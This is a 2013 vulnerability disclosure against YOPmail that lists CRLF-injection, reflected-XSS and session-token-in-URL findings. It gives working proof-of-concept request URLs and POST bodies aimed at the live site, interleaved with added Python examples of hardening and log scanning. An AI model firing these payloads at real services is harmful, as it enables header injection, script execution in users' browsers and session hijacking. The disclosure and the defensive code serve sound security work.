YOPMAIL (Anonymous & Free email address) CRLF Injection / HTTP Response Splitting / XSS / Session Token in URL
==================================================================================================================================================
Report-Timeline:
================
2013-06-01: Researcher Notification
2013-06-03: RESPONSE
2013-06-07: Ask About the issues
2013-06-10: Vendor Feedback
2013-06-13: Not Fixed
2013-06-16: Ask About the Issues
2013-06-27: Not Fixed / No Response
2013-06-28: Full Disclosure
I-VULNERABILITIES
======================
#Title: YOPMAIL (Anonymous & Free email address) YopMail CRLF Injection / HTTP Response Splitting / XSS / Session Token in URL
#Vendor: http://www.yopmail.com
#Author:Juan Carlos García (@secnight)
#Follow me
http://www.highsec.es
http://hackingmadrid.blogspot.com
Twitter:@secnight
II-Introduction:
======================
YOPmail (Your Own Protection mail) is a temporary e-mail service. Messages are kept for 8 days.
It is possible to send a message to another YOPmail address. No registration is required. Firefox, Internet Explorer 7 and Opera add-ons are
downloadable. There are alternate domains.
Domains
@yopmail.fr
@yopmail.net
@cool.fr.nf
@jetable.fr.nf
@nospam.ze.tc
@nomail.xl.cx
@mega.zik.dj
@speed.1s.fr
@courriel.fr.nf
@moncourrier.fr.nf
@monemail.fr.nf
@monmail.fr.nf
@mail.mezimages.net
The site has new domains every three months.
III-PROOF OF CONCEPT
======================
CRLF INJECTION / HTTP RESPONSE SPLITTING
______________________________________
The CRLF Injection Attack (sometimes also referred to as HTTP Response Splitting) is a fairly simple, yet extremely powerful web attack. Attackers
actively exploit this web application vulnerability to perform a wide variety of attacks, including cross-site scripting (XSS), cross-user
defacement, poisoning of the client's web cache, hijacking of web pages, defacement and a myriad of other related attacks.
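To make the mechanism concrete, here is an added example (not code from the advisory or from YOPmail) of a hypothetical server that copies a query value into a response header, the way the cr.php?cfg= requests listed under Attacks below exercise it. It shows that one URL-decoded CR/LF pair lets the client see an attacker-chosen header, and that the fix is a control-character check on the raw, decoded value before it reaches any header. The server logic and the `header_names` helper are assumptions; the payload string is the one from the report.

```python
"""Added example (not from the advisory or from YOPmail): why a raw CR/LF in a
header value splits an HTTP response, and the input check that prevents it.
The server logic below is hypothetical; the payload is the one from the report."""
from urllib.parse import unquote

CRLF = "\r\n"


def build_response_vulnerable(cfg_value: str) -> str:
    """Copy a user-controlled query value straight into a response header
    (the pattern the cr.php?cfg= requests in the report exercise)."""
    return (
        "HTTP/1.1 200 OK" + CRLF
        + "Content-Type: text/html" + CRLF
        + "Set-Cookie: cfg=" + cfg_value + CRLF
        + CRLF
        + "<html>ok</html>"
    )


def build_response_hardened(cfg_value: str) -> str:
    """Same logic, but refuse any control character before it reaches a header.
    Most frameworks do this for you; the point is that the check must run on
    the raw value after URL decoding, not on the %-encoded query string."""
    if any(ch in cfg_value for ch in "\r\n\0"):
        raise ValueError("header value contains CR, LF or NUL")
    return build_response_vulnerable(cfg_value)


def is_rejected(cfg_value: str) -> bool:
    """True when the hardened builder refuses the value."""
    try:
        build_response_hardened(cfg_value)
    except ValueError:
        return True
    return False


def header_names(response: str) -> list:
    """Minimal view of what a client sees: every CRLF-delimited line of the
    header block that contains a colon is taken as a header. A line starting
    with a space is treated as a header too (obsolete line folding is ignored)."""
    head, _, _ = response.partition(CRLF + CRLF)
    lines = head.split(CRLF)[1:]  # drop the status line
    return [line.split(":", 1)[0].strip() for line in lines if ":" in line]


# Payload from the report, URL-decoded: "\r\n SomeCustomInjectedHeader:injected_by_secnight"
PAYLOAD = unquote("%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight")

if __name__ == "__main__":
    print("vulnerable:", header_names(build_response_vulnerable(PAYLOAD)))
    print("hardened rejects payload:", is_rejected(PAYLOAD))
```

The vulnerable builder yields a third header, `SomeCustomInjectedHeader`, that the application never intended to send; with two CRLF pairs the same value ends the header block early and the rest becomes a second, attacker-written response body, which is the response-splitting case. The hardened builder rejects the decoded value outright, which is the behaviour to expect from a patched cr.php.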
Attacks
-------
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&PHPSESSID=m8aqum8ibtq1v47ql9l5cs40h5&r=211
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=524
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=919
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&r=717
Multiple CROSS SITE SCRIPTING
_______________________________
The concept of XSS is to manipulate the client-side scripts of a web application so that they execute in the manner the malicious user desires. Such a
manipulation can embed a script in a page which is then executed every time the page is loaded, or whenever an associated event fires.
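The two payload shapes in this report (a `<ScRiPt>` element in a path and a `"onmouseover=` attribute break-out) correspond to the two output contexts a reflected value usually lands in: element content and a quoted attribute. The following added example (not code from the advisory or from YOPmail) renders a hypothetical page that echoes a `login` value both ways, once unencoded and once with HTML escaping, and uses Python's own HTML tokenizer to show which version grows a script element or an event-handler attribute. The page template and helper names are assumptions; the payload shapes follow the report with arbitrary numeric arguments.

```python
"""Added example (not from the advisory or from YOPmail): a hypothetical page
that reflects the login parameter, once without encoding and once with
context-appropriate HTML escaping, checked with Python's own HTML parser."""
import html
from html.parser import HTMLParser


def render_vulnerable(login: str) -> str:
    """Echo the value into text content and into a quoted attribute unencoded,
    the pattern behind the send-mail.php?login= findings in the report."""
    return f'<p>Hello {login}</p><input name="login" value="{login}">'


def render_hardened(login: str) -> str:
    """html.escape(quote=True) converts & < > " ' to entities, which covers both
    the element context and the double-quoted attribute context used here."""
    safe = html.escape(login, quote=True)
    return f'<p>Hello {safe}</p><input name="login" value="{safe}">'


class _TagCollector(HTMLParser):
    """Record every start tag and its attribute names, as a tokenizer sees them."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, [name for name, _ in attrs]))


def _parse(markup: str) -> list:
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def tag_names(markup: str) -> list:
    """Start tags in document order (lower-cased by the parser)."""
    return [tag for tag, _ in _parse(markup)]


def event_handler_attributes(markup: str) -> list:
    """Attribute names starting with 'on' (onmouseover, onerror, ...) anywhere in the markup."""
    return sorted({n for _, names in _parse(markup) for n in names if n.startswith("on")})


# Payload shapes from the report; the numeric arguments are arbitrary
SCRIPT_PAYLOAD = "<ScRiPt>prompt(1)</ScRiPt>"
ATTRIBUTE_PAYLOAD = '"onmouseover=prompt(1)>'

if __name__ == "__main__":
    for payload in (SCRIPT_PAYLOAD, ATTRIBUTE_PAYLOAD):
        print("vulnerable:", tag_names(render_vulnerable(payload)),
              event_handler_attributes(render_vulnerable(payload)))
        print("hardened:  ", tag_names(render_hardened(payload)),
              event_handler_attributes(render_hardened(payload)))
```

The unencoded render of the attribute payload ends the `value` attribute early, so the tokenizer sees a new `onmouseover` attribute on the input element; the unencoded render of the script payload produces a `script` element in the body. After escaping, both payloads survive only as text, and the tag list is just `p` and `input`. Escaping has to match the context: `html.escape` is right for element content and quoted attributes, but a value placed inside a `<script>` block or a URL needs its own encoder.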
Attacks
--------
Below I list only a few of the vulnerable requests, because this type of failure is widespread across the service: there is a great deal of XSS.
Affected items
/add-domain.php
/alternate-domains.php
/alternate-email-address.php
/conditions.php
/contact.php
/definitions/email-jetable.php
/definitions/mail-anonyme.php
/definitions/spam.php
/donation.php
/email-anonyme.php
/email-generator.php
/en
/en/add-domain.php
/en/alternate-domains.php
/en/alternate-email-address.php
/en/conditions.php
/en/contact.php
/en/definitions
/en/definitions/email-jetable.php
/en/definitions/mail-anonyme.php
/en/definitions/spam.php
/en/donation.php
/en/email-anonyme.php
/en/email-generator.php
/en/faq.php
/en/images
/en/index.php
/en/plugins.php
/en/privacy.php
/en/send-mail.php
/en/style
/en/style/pic
/en/yopmail-chat.php
/es
/es/add-domain.php
/es/alternate-domains.php
/es/alternate-email-address.php
/es/conditions.php
/es/contact.php
/es/definitions
/es/definitions/email-jetable.php
/es/definitions/mail-anonyme.php
/es/definitions/spam.php
/es/donation.php
/es/email-anonyme.php
/es/email-generator.php
/es/faq.php
/es/images
/es/index.php
/es/plugins.php
/es/privacy.php
/es/send-mail.php
/es/style
/es/style/pic
/es/yopmail-chat.php
/faq.php
/fr
/fr/add-domain.php
/fr/alternate-domains.php
/fr/alternate-email-address.php
/fr/conditions.php
/fr/contact.php
/fr/definitions
/fr/definitions/email-jetable.php
/fr/definitions/mail-anonyme.php
/fr/definitions/spam.php
/fr/donation.php
/fr/email-anonyme.php
/fr/email-generator.php
/fr/faq.php
/fr/images
/fr/index.php
/fr/plugins.php
/fr/privacy.php
/fr/send-mail.php
/fr/style
/fr/style/pic
/fr/yopmail-chat.php
/index.php
/it
/it/add-domain.php
/it/alternate-domains.php
/it/alternate-email-address.php
/it/conditions.php
/it/contact.php
/it/definitions
/it/definitions/email-jetable.php
/it/definitions/mail-anonyme.php
/it/definitions/spam.php
/it/donation.php
/it/email-anonyme.php
/it/email-generator.php
/it/faq.php
/it/images
/it/index.php
/it/plugins.php
/it/privacy.php
/it/send-mail.php
/it/style
/it/style/pic
/it/yopmail-chat.php
/pl
/pl/add-domain.php
/pl/alternate-domains.php
/pl/alternate-email-address.php
/pl/conditions.php
/pl/contact.php
/pl/definitions
/pl/definitions/email-jetable.php
/pl/definitions/mail-anonyme.php
/pl/definitions/spam.php
/pl/donation.php
/pl/email-anonyme.php
/pl/email-generator.php
/pl/faq.php
/pl/images
/pl/index.php
/pl/plugins.php
/pl/privacy.php
/pl/send-mail.php
/pl/style
/pl/style/pic
/pl/yopmail-chat.php
/plugins.php
/privacy.php
/ru
/ru/add-domain.php
/ru/alternate-domains.php
/ru/alternate-email-address.php
/ru/conditions.php
/ru/contact.php
/ru/definitions
/ru/definitions/email-jetable.php
/ru/definitions/mail-anonyme.php
/ru/definitions/spam.php
/ru/donation.php
/ru/email-anonyme.php
/ru/email-generator.php
/ru/faq.php
/ru/images
/ru/index.php
/ru/plugins.php
/ru/privacy.php
/ru/send-mail.php
/ru/style
/ru/style/pic
/ru/yopmail-chat.php
/send-mail.php
/uk
/uk/add-domain.php
/uk/alternate-domains.php
/uk/alternate-email-address.php
/uk/conditions.php
/uk/contact.php
/uk/definitions
/uk/definitions/email-jetable.php
/uk/definitions/mail-anonyme.php
/uk/definitions/spam.php
/uk/donation.php
/uk/email-anonyme.php
/uk/email-generator.php
/uk/faq.php
/uk/images
/uk/index.php
/uk/plugins.php
/uk/privacy.php
/uk/send-mail.php
/uk/style
/uk/style/pic
/uk/yopmail-chat.php
/yopmail-chat.php
/zh
/zh/add-domain.php
/zh/alternate-domains.php
/zh/alternate-email-address.php
/zh/conditions.php
/zh/contact.php
/zh/definitions
/zh/definitions/email-jetable.php
/zh/definitions/mail-anonyme.php
/zh/definitions/spam.php
/zh/donation.php
/zh/email-anonyme.php
/zh/email-generator.php
/zh/faq.php
/zh/images
/zh/index.php
/zh/plugins.php
/zh/privacy.php
/zh/send-mail.php
/zh/style
/zh/style/pic
/zh/yopmail-chat.php
Method GET
----------
http://www.yopmail.com/zh/send-mail.php?act=n&login=secnight%27%28%highsec
http://www.yopmail.com/fr/send-mail.php?act=n&login=secnight%27%Highsec
http://www.yopmail.com/send-mail.php?act=n&login=secnight%27%28%hackingmadrid
http://www.yopmail.com/en/style/pic/1%3CScRiPt%3Eprompt(989053)%3C/ScRiPt%3E
http://www.yopmail.com/fr/images/1%3CScRiPt%3Eprompt(911745)%3C/ScRiPt%3E
http://www.yopmail.com/fr/1%3CScRiPt%3Eprompt(969668)%3C/ScRiPt%3E
http://www.yopmail.com/en/plugins.php/%22onmouseover=prompt(908426)%3E
http://www.yopmail.com/fr/alternate-email-address.php/%22onmouseover=prompt(958732)%3E
http://www.yopmail.com/en/images/1%3CScRiPt%3Eprompt(908060)%3C/ScRiPt%3E
Method POST
------------
http://www.yopmail.com:80/send-mail.php
Request Data
act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=946977%27%28%29929310&mailfromalt=secnight.highsec-1oiflzkn&[email protected]&[email protected]&[email protected]
http://www.yopmail.com:80/send-mail.php
Request Data
act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=999095%27%28%29985487&mailfromalt=eric.parker-dj9fvk3&[email protected]&[email protected]&[email protected]
http://www.yopmail.com:80/send-mail.php
Request Data
act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=950091%27%28%29972125&mailfromalt=fred.turner-7ov0wsxm&[email protected]&[email protected]&[email protected]
http://www.yopmail.com:80/zh/send-mail.php
Request Data
act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&mailsu=%22%20onmouseover%3dprompt%28939071%29%20bad%3d%22&[email protected]&[email protected]
http://www.yopmail.com:80/zh/send-mail.php
Request Data
act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=932669%27%28%29998492&mailfromalt=elsa.watson-0ojziwig&[email protected]&[email protected]&[email protected]
SESSION TOKEN IN URL
____________________
This application places a session token in the query parameters. A session token is sensitive information and should not be carried in the URL,
because URLs can be logged or leaked to other sites via the Referer header.
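Both leak paths named here, logging and the Referer header, are visible in ordinary web server logs. The following added example (not code from the advisory or from YOPmail) scans constructed combined-format log lines for a session parameter in the request target or in the Referer, and shows a redaction step for URLs that have to be logged or reported. The parameter watch-list and the log lines are constructed; the paths and the PHPSESSID value are those shown in this report.

```python
"""Added example (not from the advisory or from YOPmail): find session tokens
carried in request URLs or Referer values in web server logs, and redact them
before a URL is logged or forwarded. Log lines are constructed in combined log
format; the parameter watch-list is an assumption."""
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Query parameter names that carry session identifiers; PHPSESSID is the one
# the report found, the others are common equivalents (assumed watch-list).
SESSION_PARAMS = {"phpsessid", "jsessionid", "sessionid", "sid"}

# Apache/nginx "combined" log format
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def session_params_in_url(url: str) -> list:
    """Names of session-carrying parameters in the query string of a URL or request target."""
    query = urlsplit(url).query
    return [k for k, _ in parse_qsl(query, keep_blank_values=True) if k.lower() in SESSION_PARAMS]


def find_session_leaks(log_lines) -> list:
    """(line number, field, parameter) for every token seen in a request target
    or a Referer. A token in the Referer is exactly what a third-party server
    receives when a page carrying the token links to or embeds its content."""
    findings = []
    for n, line in enumerate(log_lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        for field in ("target", "referer"):
            for name in session_params_in_url(m.group(field)):
                findings.append((n, field, name))
    return findings


def redact_session_params(url: str) -> str:
    """Replace session values so a URL can be logged or reported safely."""
    parts = urlsplit(url)
    pairs = [(k, "REDACTED" if k.lower() in SESSION_PARAMS else v)
             for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return urlunsplit(parts._replace(query=urlencode(pairs)))


# Constructed sample log; paths and the PHPSESSID value are the ones shown in the report.
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Jun/2013:10:00:01 +0200] "GET /es/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [28/Jun/2013:10:00:02 +0200] "GET /style/pic/logo.png HTTP/1.1" 200 2048 "http://www.yopmail.com/es/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6" "Mozilla/5.0"',
    '198.51.100.7 - - [28/Jun/2013:10:00:03 +0200] "GET /en/faq.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_session_leaks(SAMPLE_LOG):
        print("session token in", finding)
    print(redact_session_params(
        "http://www.yopmail.com/es/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6&r=1"))
```

Line 1 records the token in the request itself and line 2 records it in the Referer of a follow-up request, which is the shape a third-party log would show after the browser follows a link from that page. On the server side, the fix for a PHP application is to keep the session id in a cookie only: `session.use_only_cookies = 1` and `session.use_trans_sid = 0` in php.ini, with `session.cookie_httponly = 1` so script cannot read it, which removes the PHPSESSID query parameter entirely rather than merely hiding it from the logs.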
Affected items
--------------
/cr.php (78a3a31e275b316f36665b35eb4bfe21)
/email-anonyme.php (2945f0f7603424f6b0d1a0413b7af0f1)
/email-anonyme.php (37a90c7caa8d08bb2a8ca5b5591cbdd3)
/email-anonyme.php (f508baf21a69429be4914c4008baf8ca)
/en/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/es/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/fr/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/it/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/pl/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/ru/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/uk/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/zh/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
Examples
Method GET
----------
http://www.yopmail.com/cr.inc.php?cfg=0&sn=PHPSESSID&
http://www.yopmail.com/es/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/fr/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/it/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/pl/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/ru/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/uk/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/zh/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
Method POST
-----------
/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
Request Data
act=&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&[email protected]&[email protected]&[email protected]
/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
Request Data
act=&chkalt=chkalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&[email protected]&[email protected]&[email protected]
IV. CREDITS
-------------------------
These vulnerabilities were discovered
by Juan Carlos García (@secnight)
V. LEGAL NOTICES
-------------------------
The Author accepts no responsibility for any damage
caused by the use or misuse of this information.